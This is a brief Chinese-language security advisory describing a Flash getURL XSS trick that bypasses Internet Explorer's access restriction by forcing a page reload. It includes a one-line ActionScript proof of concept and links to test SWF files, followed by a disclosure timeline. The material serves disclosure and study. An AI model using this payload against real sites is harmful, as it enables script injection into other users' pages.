Flash getURL XSS attacks--Bypass Access in IE

Author: www.80vul.com

1.描叙:

由于近年来flash的安全问题流行,adobe也做了很多的安全措施,包括在ie下getURL调用javascript时是没有办法访问document等 如下as2代码:

getURL("javascript:alert(document.domain);", "_self", "GET");

用ie6/7/8直接访问时会提示"拒绝访问"的错误.测试url:http://www.80vul.com/flash/1.swf.细心的朋友可能发现刷新1.swf后发现就可以执行弹了.根据这个特点我们可以通过js来实现这个"刷新"动作,导致可以饶过这个安全限制.

2.利用代码:

as2代码:

getURL("javascript:window.location.reload();alert(document.domain);", "_self", "GET");

测试url:http://www.80vul.com/flash/3.swf
源文件:http://www.80vul.com/flash/3.fla

3.其他

2009.1.1 发现该bug
2009.1.3 报告adobe
2009.1.4 kuza55告诉我已经有人pubic过了[http://blog.guya.net/2008/09/10/bug-in-internet-explorer-security-model-when-embedding-flash/]